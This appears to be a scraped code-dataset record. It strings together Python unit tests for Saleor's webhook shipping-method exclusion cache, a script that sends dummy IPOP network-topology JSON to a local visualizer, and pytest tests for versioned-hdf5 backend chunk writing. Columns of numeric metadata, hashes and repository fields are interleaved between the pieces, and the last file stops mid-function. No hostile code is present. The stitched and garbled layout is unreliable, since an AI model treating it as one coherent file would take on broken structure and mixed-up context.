@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_stores_in_cache_when_empty(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    order_with_lines,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """On a cache miss, the plugin calls the sync webhook and stores
    (payload, exclusions) under the order-scoped cache key with the
    configured TTL."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Cache miss: nothing stored yet.
    mocked_cache_get.return_value = None
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_order(
        order=order_with_lines,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert mocked_webhook.called
    expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(order_with_lines.id)
    expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
    mocked_cache_set.assert_called_once_with(
        expected_cache_key,
        (payload, expected_excluded_shipping_method),
        CACHE_EXCLUDED_SHIPPING_TIME,
    )
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin.generate_excluded_shipping_methods_for_order_payload"
)
def test_excluded_shipping_methods_for_order_stores_in_cache_when_payload_is_different(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    order_with_lines,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """When the cached payload differs from the freshly generated one,
    the stale entry is ignored: the webhook is re-sent and the cache is
    overwritten with the new (payload, exclusions) pair."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"order": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Stale cache entry: payload no longer matches.
    mocked_cache_get.return_value = (
        {"order": "different-payload"},
        [{"id": "1", "reason": webhook_reason}],
    )
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_order(
        order=order_with_lines,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert mocked_webhook.called
    expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(order_with_lines.id)
    expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
    mocked_cache_set.assert_called_once_with(
        expected_cache_key,
        (payload, expected_excluded_shipping_method),
        CACHE_EXCLUDED_SHIPPING_TIME,
    )
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin."
    "generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_use_cache(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    checkout_with_items,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """Checkout variant of the cache-hit case: matching cached payload
    means no sync webhook call and no cache rewrite."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Cache hit: stored payload is identical to the generated payload.
    mocked_cache_get.return_value = (payload, [{"id": "1", "reason": webhook_reason}])
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_checkout(
        checkout=checkout_with_items,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert not mocked_webhook.called
    assert not mocked_cache_set.called
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin."
    "generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_stores_in_cache_when_empty(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    checkout_with_items,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """Checkout variant of the cache-miss case: the webhook is called
    and the result is cached under the checkout-token cache key."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Cache miss: nothing stored yet.
    mocked_cache_get.return_value = None
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_checkout(
        checkout=checkout_with_items,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert mocked_webhook.called
    # Checkout cache keys use the checkout token, not a numeric id.
    expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(checkout_with_items.token)
    expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
    mocked_cache_set.assert_called_once_with(
        expected_cache_key,
        (payload, expected_excluded_shipping_method),
        CACHE_EXCLUDED_SHIPPING_TIME,
    )
@mock.patch("saleor.plugins.webhook.shipping.cache.get")
@mock.patch("saleor.plugins.webhook.shipping.cache.set")
@mock.patch("saleor.plugins.webhook.tasks.send_webhook_request_sync")
@mock.patch(
    "saleor.plugins.webhook.plugin."
    "generate_excluded_shipping_methods_for_checkout_payload"
)
def test_excluded_shipping_methods_for_checkout_stores_in_cache_when_payload_different(
    mocked_payload,
    mocked_webhook,
    mocked_cache_set,
    mocked_cache_get,
    webhook_plugin,
    checkout_with_items,
    available_shipping_methods_factory,
    shipping_app_factory,
):
    """Checkout variant of the stale-cache case: a mismatched cached
    payload forces a fresh webhook call and a cache overwrite."""
    # given
    shipping_app_factory()
    webhook_reason = "Order contains dangerous products."
    other_reason = "Shipping is not applicable for this order."
    mocked_webhook.return_value = {
        "excluded_methods": [
            {
                "id": graphene.Node.to_global_id("ShippingMethod", "1"),
                "reason": webhook_reason,
            }
        ]
    }
    payload = json.dumps({"checkout": {"id": 1, "some_field": "12"}})
    mocked_payload.return_value = payload
    # Stale cache entry: payload no longer matches.
    mocked_cache_get.return_value = (
        {"checkout": "different_payload"},
        [{"id": "1", "reason": webhook_reason}],
    )
    plugin = webhook_plugin()
    available_shipping_methods = available_shipping_methods_factory(num_methods=2)
    previous_value = [
        ExcludedShippingMethod(id="1", reason=other_reason),
        ExcludedShippingMethod(id="2", reason=other_reason),
    ]
    # when
    plugin.excluded_shipping_methods_for_checkout(
        checkout=checkout_with_items,
        available_shipping_methods=available_shipping_methods,
        previous_value=previous_value,
    )
    # then
    assert mocked_webhook.called
    # Checkout cache keys use the checkout token, not a numeric id.
    expected_cache_key = CACHE_EXCLUDED_SHIPPING_KEY + str(checkout_with_items.token)
    expected_excluded_shipping_method = [{"id": "1", "reason": webhook_reason}]
    mocked_cache_set.assert_called_once_with(
        expected_cache_key,
        (payload, expected_excluded_shipping_method),
        CACHE_EXCLUDED_SHIPPING_TIME,
    )
| 31.634877
| 88
| 0.710336
| 1,311
| 11,610
| 5.877956
| 0.061022
| 0.093434
| 0.093434
| 0.068518
| 0.981573
| 0.979756
| 0.979756
| 0.979756
| 0.979756
| 0.979756
| 0
| 0.005332
| 0.192248
| 11,610
| 366
| 89
| 31.721311
| 0.816379
| 0.008183
| 0
| 0.793919
| 0
| 0
| 0.196677
| 0.114562
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.02027
| false
| 0
| 0.016892
| 0
| 0.037162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be745fbc41f8d46e5841c2ad060cd87d3cfbb80d
| 9,545
|
py
|
Python
|
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | 1
|
2019-10-31T03:59:09.000Z
|
2019-10-31T03:59:09.000Z
|
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | null | null | null |
test/send_dummy_vis_data.py
|
ashishnargundkar/Network-Visualizer
|
5f320a889273f98dffa0b46b6ad35607a646065d
|
[
"MIT"
] | 9
|
2017-08-17T14:47:27.000Z
|
2021-01-27T17:11:41.000Z
|
import time
import logging
import simplejson as json
import requests
logging.basicConfig(level=logging.INFO)
odd_tick_reqs = [
{
'Data': {
'O1': {
'LinkManager': {
'LN1N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN1N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
'LN1N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N1'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN2N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN2N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
'LN2N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N2'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN3N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN3N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN3N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N3'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN4N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN4N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
'LN4N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N4'
}
]
even_tick_requs = [
{
'Data': {
'O1': {
'LinkManager': {
'LN1N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
#'LN1N3': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N3'
#},
'LN1N4': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N4'
},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N1'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN2N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
'LN2N3': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N3'
},
#'LN2N4': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N4'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N2'
},
{
'Data': {
'O1': {
'LinkManager': {
#'LN3N1': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N1'
#},
'LN3N2': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N2'
},
#'LN3N4': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N4'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N3'
},
{
'Data': {
'O1': {
'LinkManager': {
'LN4N1': {
'Stats': {
'sent_bytes_second': '50000',
'rem_addr': '10.24.95.100:53468'
},
'PeerId': 'N1'
},
#'LN4N2': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N2'
#},
#'LN4N3': {
# 'Stats': {
# 'sent_bytes_second': '50000',
# 'rem_addr': '10.24.95.100:53468'
# },
# 'PeerId': 'N3'
#},
},
'Topology': {
'PrefixLen': 16,
'GeoIP': '1.2.3.4',
'MAC': 'FF:FF:FF:FF:FF',
'VIP4': '2.3.4.5',
'InterfaceName': 'ipop_tap0'
}
}
},
'NodeId': 'N4'
}
]
if __name__ == '__main__':
    # Alternate between the two fixture sets on every tick so the
    # visualizer sees links appear/disappear, PUTting each node's state
    # to the local Network-Visualizer REST API every 15 seconds.
    tick = 0
    while True:
        if tick % 2:
            reqs = odd_tick_reqs
            which = 'odd'
        else:
            reqs = even_tick_requs
            which = 'even'
        for r in reqs:
            node_id = r['NodeId']
            logging.info('Making {} request for node_id {}' \
                         .format(which, node_id))
            requests.put('http://localhost:5000/IPOP/nodes/'+node_id,
                         data=json.dumps(r), headers={'Content-Type':
                                                      'application/json'})
        tick += 1
        logging.info('Sleeping for 15...')
        time.sleep(15)
| 28.577844
| 74
| 0.280775
| 667
| 9,545
| 3.868066
| 0.137931
| 0.049612
| 0.130233
| 0.186047
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0.843411
| 0
| 0.158202
| 0.568884
| 9,545
| 333
| 75
| 28.663664
| 0.468773
| 0.079832
| 0
| 0.58156
| 0
| 0
| 0.246196
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014184
| 0
| 0.014184
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
be84875c296b27e763474c2405cae5a0ab2dfc8b
| 53
|
py
|
Python
|
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
testing/run.py
|
ChiragAswani/chigpy
|
c52effc52323e2645953c7415066bd282e693769
|
[
"MIT"
] | null | null | null |
# Smoke test: import the chigpy package and print the module object plus the
# `full_name` attribute it is expected to expose.
import chigpy
print(chigpy)
print(chigpy.full_name)
| 10.6
| 23
| 0.811321
| 8
| 53
| 5.25
| 0.625
| 0.52381
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09434
| 53
| 4
| 24
| 13.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
fe26392562e859041cc64f3f1d8c00dbbabc2345
| 23,700
|
py
|
Python
|
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
versioned_hdf5/tests/test_backend.py
|
melissawm/versioned-hdf5
|
930f3ab842d22a5b99769239692867345a4c616e
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from numpy.testing import assert_equal
from ndindex import Slice, Tuple
from pytest import mark, raises
import itertools
from .helpers import setup
from ..backend import (create_base_dataset, write_dataset,
create_virtual_dataset, DEFAULT_CHUNK_SIZE,
write_dataset_chunks)
from ..slicetools import split_chunks
CHUNK_SIZE_3D = 2**4 # = cbrt(DEFAULT_CHUNK_SIZE)
def test_initialize():
    """Smoke test: setup() yields a file object that can be closed."""
    with setup() as handle:
        pass
    # NOTE(review): closing after the `with` exits assumes setup() does not
    # already close the file on exit -- confirm against helpers.setup.
    handle.close()
def test_create_base_dataset(h5file):
    """create_base_dataset stores raw data as float64 under _version_data."""
    ones = np.ones((DEFAULT_CHUNK_SIZE,))
    create_base_dataset(h5file, 'test_data', data=ones)
    raw = h5file['_version_data/test_data/raw_data']
    assert raw.dtype == np.float64
def test_create_base_dataset_multidimension(h5file):
    """3-D variant: explicit chunks, raw data still stored as float64."""
    shape = (CHUNK_SIZE_3D, CHUNK_SIZE_3D, 2)
    create_base_dataset(h5file, 'test_data', data=np.ones(shape),
                        chunks=(CHUNK_SIZE_3D, CHUNK_SIZE_3D, CHUNK_SIZE_3D))
    raw = h5file['_version_data/test_data/raw_data']
    assert raw.dtype == np.float64
def test_write_dataset(h5file):
    """write_dataset deduplicates identical chunks and appends new ones."""
    D = DEFAULT_CHUNK_SIZE

    def chunk_key(i):
        # Key addressing the i-th chunk of a 1-D dataset.
        return (Slice(i * D, (i + 1) * D, 1),)

    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * D,)))
    slices2 = write_dataset(
        h5file, 'test_data',
        np.concatenate((2 * np.ones((D,)),
                        2 * np.ones((D,)),
                        3 * np.ones((D,)))))

    # Both all-ones chunks map onto the single stored chunk of ones.
    assert slices1 == {chunk_key(0): slice(0, D),
                       chunk_key(1): slice(0, D)}
    # The two chunks of twos dedupe onto one stored chunk; threes get a new one.
    assert slices2 == {chunk_key(0): slice(D, 2 * D),
                       chunk_key(1): slice(D, 2 * D),
                       chunk_key(2): slice(2 * D, 3 * D)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (3 * D,)
    assert_equal(ds[0:D], 1.0)
    assert_equal(ds[D:2 * D], 2.0)
    assert_equal(ds[2 * D:3 * D], 3.0)
    # Past the stored data the dataset reads back as the 0.0 fill value.
    assert_equal(ds[3 * D:4 * D], 0.0)
    assert ds.dtype == np.float64
def test_write_dataset_multidimension(h5file):
    """3-D write: all-equal chunks dedupe to one slot; distinct chunks append."""
    C = CHUNK_SIZE_3D
    chunks = (C, C, C)
    # The eight chunk corners of the 2x2x2 chunk grid, in product order,
    # matching the order write_dataset stores them.
    corners = list(itertools.product([0, 1], repeat=3))

    def chunk_key(i, j, k):
        # Key addressing the (i, j, k)-th chunk of the grid.
        return (Slice(i * C, (i + 1) * C, 1),
                Slice(j * C, (j + 1) * C, 1),
                Slice(k * C, (k + 1) * C, 1))

    data = np.zeros((2 * C, 2 * C, 2 * C))
    slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)

    # Second write: give every chunk a distinct constant value n.
    data2 = data.copy()
    for n, (i, j, k) in enumerate(corners):
        data2[i * C:(i + 1) * C, j * C:(j + 1) * C, k * C:(k + 1) * C] = n
    slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)

    # Every all-zero chunk of the first write shares stored chunk 0.
    assert slices1 == {chunk_key(i, j, k): slice(0, C)
                       for i, j, k in corners}
    # Each distinct chunk of the second write lands in its own slot
    # (chunk 0 reuses the existing zeros chunk).
    assert slices2 == {chunk_key(i, j, k): slice(n * C, (n + 1) * C)
                       for n, (i, j, k) in enumerate(corners)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (8 * C, C, C)
    for n in range(8):
        assert_equal(ds[n * C:(n + 1) * C], n)
    assert ds.dtype == np.float64
def test_write_dataset_chunks(h5file):
    """write_dataset_chunks accepts a mix of reused slices and raw arrays."""
    D = DEFAULT_CHUNK_SIZE

    def key(i):
        # ndindex Tuple key for the i-th 1-D chunk.
        return Tuple(Slice(i * D, (i + 1) * D, 1))

    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * D,)))
    slices2 = write_dataset_chunks(h5file, 'test_data', {
        key(0): slices1[key(0)],        # reuse the stored chunk of ones
        key(1): 2 * np.ones((D,)),
        key(2): 2 * np.ones((D,)),      # dedupes with the previous chunk
        key(3): 3 * np.ones((D,)),
    })

    assert slices1 == {key(0): slice(0, D),
                       key(1): slice(0, D)}
    assert slices2 == {key(0): slice(0, D),
                       key(1): slice(D, 2 * D),
                       key(2): slice(D, 2 * D),
                       key(3): slice(2 * D, 3 * D)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (3 * D,)
    assert_equal(ds[0:D], 1.0)
    assert_equal(ds[D:2 * D], 2.0)
    assert_equal(ds[2 * D:3 * D], 3.0)
    assert_equal(ds[3 * D:4 * D], 0.0)
    assert ds.dtype == np.float64
def test_write_dataset_chunks_multidimension(h5file):
    """3-D write_dataset_chunks with one reused chunk and seven raw arrays."""
    C = CHUNK_SIZE_3D
    chunks = 3 * (C,)
    shape = (2 * C, 2 * C, 2 * C)
    data = np.zeros(shape)
    slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)

    data_dict = {}
    for n, c in enumerate(split_chunks(shape, chunks)):
        # Chunk 0 reuses the slice from the first write; the rest are fresh
        # constant arrays.
        data_dict[c] = slices1[c] if n == 0 else n * np.ones(chunks)

    # NOTE(review): this second identical write looks redundant (same data and
    # chunks as above) -- presumably it just dedupes to the same slices; confirm.
    slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
    slices2 = write_dataset_chunks(h5file, 'test_data', data_dict)

    assert slices1 == {c: slice(0, C) for c in split_chunks(shape, chunks)}
    assert slices2 == {c: slice(i * C, (i + 1) * C)
                       for i, c in enumerate(split_chunks(shape, chunks))}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (8 * C, C, C)
    for n in range(8):
        assert_equal(ds[n * C:(n + 1) * C], n)
    assert ds.dtype == np.float64
def test_write_dataset_offset(h5file):
    """A trailing partial chunk is stored (and keyed) with its short length."""
    D = DEFAULT_CHUNK_SIZE

    def key(start, stop):
        return (Slice(start, stop, 1),)

    slices1 = write_dataset(h5file, 'test_data', np.ones((2 * D,)))
    slices2 = write_dataset(
        h5file, 'test_data',
        np.concatenate((2 * np.ones((D,)),
                        2 * np.ones((D,)),
                        3 * np.ones((D - 2,)))))

    assert slices1 == {key(0, D): slice(0, D),
                       key(D, 2 * D): slice(0, D)}
    assert slices2 == {key(0, D): slice(D, 2 * D),
                       key(D, 2 * D): slice(D, 2 * D),
                       # The final chunk is 2 elements short.
                       key(2 * D, 3 * D - 2): slice(2 * D, 3 * D - 2)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (3 * D,)
    assert_equal(ds[0:D], 1.0)
    assert_equal(ds[D:2 * D], 2.0)
    assert_equal(ds[2 * D:3 * D - 2], 3.0)
    assert_equal(ds[3 * D - 2:4 * D], 0.0)
def test_write_dataset_offset_multidimension(h5file):
    """3-D write where every axis has a trailing partial chunk (size C - 2)."""
    C = CHUNK_SIZE_3D
    chunks = 3 * (C,)
    corners = list(itertools.product([0, 1], repeat=3))

    shape = (2 * C, 2 * C, 2 * C)
    data = np.zeros(shape)
    slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)

    # Second dataset is 2 elements short along every axis; label each chunk
    # region (of the full grid) with its chunk number.
    shape2 = (2 * C - 2, 2 * C - 2, 2 * C - 2)
    data2 = np.empty(shape2)
    for n, c in enumerate(split_chunks(shape, chunks)):
        data2[c.raw] = n
    slices2 = write_dataset(h5file, 'test_data', data2, chunks=chunks)

    def full_key(i, j, k):
        # Chunk key in the full (2C)^3 dataset.
        return tuple(Slice(0, C, 1) if d == 0 else Slice(C, 2 * C, 1)
                     for d in (i, j, k))

    def short_key(i, j, k):
        # Chunk key in the truncated (2C-2)^3 dataset: the second chunk on
        # each axis stops 2 early.
        return tuple(Slice(0, C, 1) if d == 0 else Slice(C, 2 * C - 2, 1)
                     for d in (i, j, k))

    # All-zero chunks of the first write share stored chunk 0.
    assert slices1 == {full_key(i, j, k): slice(0, C) for i, j, k in corners}
    # Each chunk of the second write gets its own slot; the stored extent is
    # 2 short exactly when the chunk is truncated along the first axis.
    assert slices2 == {
        short_key(i, j, k): slice(n * C, (n + 1) * C - (2 if i else 0))
        for n, (i, j, k) in enumerate(corners)}

    ds = h5file['/_version_data/test_data/raw_data']
    assert ds.shape == (8 * C, C, C)
    for n, c in enumerate(split_chunks(shape2, chunks)):
        # Each stored chunk holds n in the in-bounds region, 0 elsewhere.
        expected = np.zeros(chunks)
        expected[Tuple(*[slice(0, i) for i in shape2]).as_subindex(c).raw] = n
        assert_equal(ds[n * C:(n + 1) * C], expected)
    assert ds.dtype == np.float64
@mark.setup_args(version_name='test_version')
def test_create_virtual_dataset(h5file):
    """create_virtual_dataset stitches stored chunks into one virtual view."""
    D = DEFAULT_CHUNK_SIZE
    with h5file as f:
        slices1 = write_dataset(f, 'test_data', np.ones((2 * D,)))
        slices2 = write_dataset(
            f, 'test_data',
            np.concatenate((2 * np.ones((D,)), 3 * np.ones((D,)))))
        # Extend the first version's map with a third virtual chunk that
        # points at the stored chunk of threes.
        chunk_map = dict(slices1)
        chunk_map[Tuple(Slice(2 * D, 3 * D, 1))] = \
            slices2[(Slice(D, 2 * D, 1),)]
        virtual_data = create_virtual_dataset(f, 'test_version', 'test_data',
                                              chunk_map)
        assert virtual_data.shape == (3 * D,)
        assert_equal(virtual_data[0:2 * D], 1.0)
        assert_equal(virtual_data[2 * D:3 * D], 3.0)
        assert virtual_data.dtype == np.float64
@mark.setup_args(version_name=['test_version1', 'test_version2'])
def test_create_virtual_dataset_multidimension(h5file):
    """Virtual datasets over a 3-D raw store, one per written version."""
    C = CHUNK_SIZE_3D
    chunks = 3 * (C,)
    shape = (2 * C, 2 * C, 2 * C)
    corners = list(itertools.product([0, 1], repeat=3))

    data = np.ones(shape)
    slices1 = write_dataset(h5file, 'test_data', data, chunks=chunks)
    virtual_data = create_virtual_dataset(h5file, 'test_version1',
                                          'test_data', slices1)
    assert virtual_data.shape == shape
    assert_equal(virtual_data[:], 1)
    assert virtual_data.dtype == np.float64

    # Second version: every chunk gets a distinct constant value.
